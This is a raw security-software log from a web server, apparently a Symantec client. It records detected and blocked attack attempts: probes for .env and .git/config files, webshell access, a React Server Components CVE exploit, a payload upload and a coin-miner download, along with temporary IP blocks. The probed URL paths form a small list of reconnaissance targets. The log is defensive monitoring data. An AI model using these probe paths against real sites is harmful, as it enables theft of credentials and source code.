0000039b	01dc944aaf73a6a3	000000ce	0000000f	164a8367	a2383a02	00000002	00000002	00000001	01dc944a8b305883	01dc944a8b305883	00000001	00000114	[SID: 33832] Audit: Suspicious Scan Attempt 5 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjhBQjNEQzU1LTk0NEEtMTFGMS1BMzg2LTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzM4MzIsIm5hbWUiOiJBdWRpdDogU3VzcGljaW91cyBTY2FuIEF0dGVtcHQgNSIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00008428	00010000	00000002	00000002	0000c039	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Suspicious Scan Attempt 5	http://patahcmc.com/ALFA_DATA/alfacgiapi/perl.alfa			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000391	01dc944aaf73a6a3	000000ce	0000000f	164a8367	a2383a02	00000002	00000002	00000001	01dc944a8b351d56	01dc944a8b351d56	00000001	00000114	[SID: 33832] Audit: Suspicious Scan Attempt 5 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjhBRDVBRTAxLTk0NEEtMTFGMS1BMzk0LTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzM4MzIsIm5hbWUiOiJBdWRpdDogU3VzcGljaW91cyBTY2FuIEF0dGVtcHQgNSIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00008428	00010000	00000002	00000002	0000c039	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Suspicious Scan Attempt 5	http://patahcmc.com/alfacgiapi/perl.alfa			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000378	01dc944b05e09859	000000ce	0000000f	164a8367	9602a314	00000002	00000002	00000001	01dc944ae0d37136	01dc944ae0d37136	00000001	00000110	[SID: 32329] Audit: Malicious Scan Attempt 2 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkUwRDI4RkQzLTk0NEEtMTFGMS04N0E1LTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIzMjksIm5hbWUiOiJBdWRpdDogTWFsaWNpb3VzIFNjYW4gQXR0ZW1wdCAyIiwicmlza19pZCI6MCwidHlwZV9pZCI6Nn19			Default	none		00007e49	00010000	00000002	00000002	0000ba6e	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Malicious Scan Attempt 2	http://103.131.74.22/			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003b6	01dc944c1312e277	000000ce	0000000f	164a8367	ab0b628d	00000002	00000002	00000001	01dc944beeb9577d	01dc944beeb9577d	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkVFQjg4MkQ2LTk0NEItMTFGMS05NkQ5LTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	000078c8	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ford-tayninh.vn/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003b7	01dc944c1d0edd06	000000ce	0000000f	164a8367	ab0b628d	00000002	00000002	00000001	01dc944bf7166709	01dc944bf7166709	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkY3MTVBMjYwLTk0NEItMTFGMS04QTVCLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000afc7	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://fordlongan2s.com/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000213	01dc944cc3566c35	000000cf	00000007	164a8367	d1938ec1	00000001	00000000	00000001	01dc944cc2af871e	01dc944e2850431e	00000001	00000000	The client will block traffic from IP address 193.142.147.209 for the next 600 seconds (from 2/2/2026 9:03:51 PM to 2/2/2026 9:13:51 PM).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
00000403	01dc944ce7ec3b45	000000ce	00000003	164a8367	d1938ec1	00000002	00000001	00000001	01dc944cc27b1300	01dc944cc27b1300	00000001	00000158	[SID: 35300] Web Attack: Meta React Server Components CVE-2025-55182 2 attack blocked. Traffic has been blocked for this application: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkMyN0FDMTU0LTk0NEMtMTFGMS1CMUE5LTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJjdmVfdWlkIjoiQ1ZFLTIwMjUtNTUxODIiLCJpZCI6MzUzMDAsIm5hbWUiOiJXZWIgQXR0YWNrOiBNZXRhIFJlYWN0IFNlcnZlciBDb21wb25lbnRzIENWRS0yMDI1LTU1MTgyIDIiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		000089e4	00010000	00000002	00000002	0000c5ce	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: Meta React Server Components CVE-2025-55182 2	http://103.131.74.22:80/			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003fb	01dc944ce7ec3b45	000000ce	00000003	164a8367	d1938ec1	00000002	00000001	00000001	01dc944cc3055be8	01dc944cc3055be8	00000001	00000154	[SID: 35256] Web Attack: Meta React Server Components CVE-2025-55182 attack blocked. Traffic has been blocked for this application: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkMyN0FDMTUzLTk0NEMtMTFGMS1CMUE5LTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJjdmVfdWlkIjoiQ1ZFLTIwMjUtNTUxODIiLCJpZCI6MzUyNTYsIm5hbWUiOiJXZWIgQXR0YWNrOiBNZXRhIFJlYWN0IFNlcnZlciBDb21wb25lbnRzIENWRS0yMDI1LTU1MTgyIiwicmlza19pZCI6MCwidHlwZV9pZCI6Nn19			Default	none		000089b8	00010001	00000002	00000002	0000c5ce	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: Meta React Server Components CVE-2025-55182	http://103.131.74.22:80/			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003a3	01dc944ce7ec3b45	000000ce	00000003	164a8367	d1938ec1	00000002	00000001	00000001	01dc944cc30a20df	01dc944cc30a20df	00000001	0000011c	[SID: 35273] Web Attack: Malicious Payload Upload 40 attack blocked. Traffic has been blocked for this application: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkMyN0FDMTUyLTk0NEMtMTFGMS1CMUE5LTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzUyNzMsIm5hbWUiOiJXZWIgQXR0YWNrOiBNYWxpY2lvdXMgUGF5bG9hZCBVcGxvYWQgNDAiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		000089c9	00010002	00000002	00000002	0000c5ce	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: Malicious Payload Upload 40	http://103.131.74.22:80/			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
0000039b	01dc944d310b688d	000000ce	0000000f	164a8367	f70a942d	00000002	00000002	00000001	01dc944d0d0684a3	01dc944d0d0684a3	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjBEMDNGRTFELTk0NEQtMTFGMS05RUVDLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	0000725e	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://vlvn-co.com/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000217	01dc944e4ed882f7	000000d3	0000000f	164a8367	d1938ec1	00000001	00000000	00000000	01dc944e2861c5cc	01dc944e2861c5cc	00000001	00000000	Active Response that started at 2/2/2026 9:03:51 PM is disengaged. The traffic from IP address 193.142.147.209 was blocked for 600 second(s).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
0000038f	01dc944e91577101	000000ce	0000000f	164a8367	f999e14a	00000002	00000002	00000001	01dc944e6d61175a	01dc944e6d61175a	00000001	00000114	[SID: 33355] Audit: WebShell Access Attempt 2 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjZENUVBMDU2LTk0NEUtMTFGMS04MkI1LTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzMzNTUsIm5hbWUiOiJBdWRpdDogV2ViU2hlbGwgQWNjZXNzIEF0dGVtcHQgMiIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		0000824b	00010000	00000002	00000002	00001815	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: WebShell Access Attempt 2	http://m.suadiennuochanoi.vn/shell.php			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000211	01dc944f2d8b5840	000000cf	00000007	164a8367	164a8367	00000001	00000000	00000001	01dc944f2a6a3e1b	01dc9450900afa1b	00000001	00000000	The client will block traffic from IP address 103.131.74.22 for the next 600 seconds (from 2/2/2026 9:21:04 PM to 2/2/2026 9:31:04 PM).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
00000db9	01dc944f4ec93e98	000000ce	00000007	164a8367	164a8367	00000002	00000001	00000001	01dc944f2a60b3fa	01dc944f2a60b3fa	00000001	00000a94	[SID: 31908] Web Attack: JSCoinminer Download 108 attack blocked. Traffic has been blocked for this application: C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE		C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE	eyJhY3RvciI6eyJjbWRfbGluZSI6IlwiQzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXFBsZXNrXFxBZGRpdGlvbmFsXFxQbGVza1BIUDU2XFxwaHAtY2dpLmV4ZVwiIiwiZmlsZSI6eyJjb21wYW55X25hbWUiOiJUaGUgUEhQIEdyb3VwIiwiY3JlYXRlZCI6MTU0NzA1MTY3MjAwMCwiZm9sZGVyIjoiYzpcXHByb2dyYW0gZmlsZXMgKHg4NilcXHBsZXNrXFxhZGRpdGlvbmFsXFxwbGVza3BocDU2XFwiLCJtZDUiOiI4MkM1NjQ1NjdDNkI5MTUxNTE0ODBFQjUxMTU4MDhCRSIsIm5hbWUiOiJwaHAtY2dpLmV4ZSIsInBhdGgiOiJjOlxccHJvZ3JhbSBmaWxlcyAoeDg2KVxccGxlc2tcXGFkZGl0aW9uYWxcXHBsZXNrcGhwNTZcXHBocC1jZ2kuZXhlIiwicHJvZHVjdF9uYW1lIjoiUEhQIiwic2hhMSI6IjVBNzg1MkQyMjk0OTMyMDMzRTc2Q0Q2MDY1M0YyQTM1MkMwNjFGRkMiLCJzaGEyIjoiODNEMjRDOURCNDdBOTUzNjUyQUIyQzg0Njg4Q0M4NTdBMDNCRjBBM0Q1MjU4Nzc1MEJFNTJDMzZDRUNENzc3OSIsInNpZ25hdHVyZV92YWx1ZSI6MTA5OTUxMTYyNzc3Niwic2lnbmF0dXJlX3ZhbHVlX2lkcyI6WzBdLCJ2ZXJzaW9uIjoiNS42LjQwIiwieGF0dHJpYnV0ZXMiOnsicG9ydGFsIjpmYWxzZX19LCJwaWQiOjc3NTIsInNlc3Npb25faWQiOjAsInN0YXJ0X3RpbWUiOjE3NzAwNDAzMTU0OTEsInVpZCI6IjA0NjgyMzFDLTAwMjctRjFGMS1COUVDLUUwRDBGNzg0MENCQiJ9LCJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoyfSwiZGV0ZWN0aW9uX3VpZCI6IjJBNjA1Mjg1LTk0NEYtMTFGMS1CM0ZDLTgwNkU2RjZFNjk2MyIsInBhcmVudCI6eyJjbWRfbGluZSI6IkM6XFxXSU5ET1dTXFxTeXNXT1c2NFxcaW5ldHNydlxcdzN3cC5leGUgLWFwIFwic3VqY29tLmNvbShkb21haW4pKDIuMCkocG9vbClcIiAtdiBcInYyLjBcIiAtbCBcIndlYmVuZ2luZTQuZGxsXCIgLWEgXFxcXC5cXHBpcGVcXGlpc2lwbTdkNmJkODQ1LTcyMjctNDA4My05Y2E0LTk3OGI1ZGFiNzE0MiAtaCBcIkM6XFxpbmV0cHViXFx0ZW1wXFxhcHBwb29sc1xcc3VqY29tLmNvbShkb21haW4pKDIuMCkocG9vbClcXHN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpLmNvbmZpZ1wiIC13IFwiXCIgLW0gMCAtdCA1IC10YSAwIiwiZmlsZSI6eyJjb21wYW55X25hbWUiOiJNaWNyb3NvZnQgQ29ycG9yYXRpb24iLCJjcmVhdGVkIjoxNjIwNDYxNzYyMTkxLCJmb2xkZXIiOiJjOlxcd2luZG93c1xcc3lzd293NjRcXGluZXRzcnZcXCIsIm1kNSI6IjNEMjcyNTc0RjM3OEJBMDZGRDJCODVDQjc3OUMwM0FBIiwibmFtZSI6Inczd3AuZXhlIiwicGF0aCI6ImM6XFx3aW5kb3dzXFxzeXN3b3c2NFxcaW5ldHNydlxcdzN3cC5leGUiLCJwcm9kdWN0X25hbWUiOiJJbnRlcm5ldCBJbmZvcm1hdGlvbiBTZXJ2aWNlcyIsInNoYTEiOiIxOTE3RjY5RUQyNjBFNTEzMTAxNUY5QTVENzIxMUFGNzBGMEVBNTNCIiwic2hhMiI6IkE0RTFBNUIxNDg5QjMxNjA2NEYwODNDNENEN0JGQzgzQjcwRUU0Njg0QTREOTdEMUFEMUM0RTZENjQ4MTYxQTMiLCJzaWduYXR1cmVfY29tcGFueV9uYW1lIjoiTWljcm9zb2Z0IENvcnBvcmF0aW9uIiwic2lnbmF0dXJlX2NyZWF0ZWRfZGF0ZSI6MTc0ODM1ODU0MDAwMCwic2lnbmF0dXJlX2lzc3VlciI6Ik1pY3Jvc29mdCBXaW5kb3dzIFByb2R1Y3Rpb24gUENBIDIwMTEiLCJzaWduYXR1cmVfdmFsdWUiOjEwOTk1MjA3NzQxOTksInNpZ25hdHVyZV92YWx1ZV9pZHMiOlsxLDIsMyw1LDYsMTMsMTYsMTcsMTgsMjBdLCJ2ZXJzaW9uIjoiMTAuMC4yMDM0OC4xIiwieGF0dHJpYnV0ZXMiOnsicG9ydGFsIjpmYWxzZX19LCJwaWQiOjIxMjY4LCJzZXNzaW9uX2lkIjowLCJzdGFydF90aW1lIjoxNzcwMDM1MzM5NDA0LCJ1aWQiOiIwNDY4MTc1Ny0wMDI3LUYxRjEtQjlFQy1FMEQwRjc4NDBDQkIifSwicmVtZWRpYXRlZCI6dHJ1ZSwidGhyZWF0Ijp7ImlkIjozMTkwOCwibmFtZSI6IldlYiBBdHRhY2s6IEpTQ29pbm1pbmVyIERvd25sb2FkIDEwOCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007ca4	00010001	00000002	00000002	00000050	0000fb00	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: JSCoinminer Download 108	http://geomax.vn/wp-cron.php?doing_wp_cron=1770042061.0911099910736083984375			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		83D24C9DB47A953652AB2C84688CC857A03BF0A3D52587750BE52C36CECD7779	00000000	00000000	
000003b0	01dc944f6cb6ce8c	000000ce	0000000f	164a8367	400a942d	00000002	00000002	00000001	01dc944f4645fdf4	01dc944f4645fdf4	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjQ2NDJDNTlCLTk0NEYtMTFGMS1BRkFFLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	0000d7aa	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://e.toantrituesmartbrain.com/admin/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003a6	01dc944fc9cf5f17	000000ce	0000000f	164a8367	f70a942d	00000002	00000002	00000001	01dc944fa4da2558	01dc944fa4da2558	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkE0RDczMTlELTk0NEYtMTFGMS04NzU5LTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	0000af5a	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://sieuthighevanphong.com/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
0000039a	01dc944fd3e9ae6e	000000ce	0000000f	164a8367	f40a942d	00000002	00000002	00000001	01dc944faf5df216	01dc944faf5df216	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkFGNUQyRDVCLTk0NEYtMTFGMS1CQkMzLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	00007f30	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://sujcom.com/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003b2	01dc944fff927656	000000ce	0000000f	164a8367	6cf15c5b	00000002	00000002	00000001	01dc944fd9833f17	01dc944fd9833f17	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkQ5NUM4MjM5LTk0NEYtMTFGMS1BRDYwLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000858c	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://thcscva.com/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003b1	01dc94501a329235	000000ce	0000000f	164a8367	f40a942d	00000002	00000002	00000001	01dc944ff54c73c8	01dc944ff54c73c8	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkY1NDkyOUEzLTk0NEYtMTFGMS05OTE3LTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	00001096	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://sujcom.com/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003b8	01dc94501a329235	000000ce	0000000f	164a8367	f40a942d	00000002	00000002	00000001	01dc944ff5f895d1	01dc944ff5f895d1	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkY1RjI2QzRCLTk0NEYtMTFGMS05OTVFLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	00001096	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://sujcom.com/portal/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003b5	01dc94501a329235	000000ce	0000000f	164a8367	f40a942d	00000002	00000002	00000001	01dc944ff62d83ee	01dc944ff62d83ee	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkY2MjA2OUE2LTk0NEYtMTFGMS05OTcxLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	00001096	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://sujcom.com/env/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003c2	01dc94501d891e84	000000ce	0000000f	164a8367	f40a942d	00000002	00000002	00000001	01dc944ff7ecca14	01dc944ff7ecca14	00000001	00000128	[SID: 33269] Audit: Possible Misconfigured Symfony Application attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkY3RTA2Q0YyLTk0NEYtMTFGMS05ODJELTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzMyNjksIm5hbWUiOiJBdWRpdDogUG9zc2libGUgTWlzY29uZmlndXJlZCBTeW1mb255IEFwcGxpY2F0aW9uIiwicmlza19pZCI6MCwidHlwZV9pZCI6Nn19			Default	none		000081f5	00010000	00000002	00000002	00001096	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Possible Misconfigured Symfony Application	http://sujcom.com/_profiler/phpinfo			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003b9	01dc9450317d9f7e	000000ce	0000000f	164a8367	f40a942d	00000002	00000002	00000001	01dc94500adcefa5	01dc94500adcefa5	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjBBREFFRTc4LTk0NTAtMTFGMS05MDIzLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	000045e8	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://sujcom.com/awstats/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
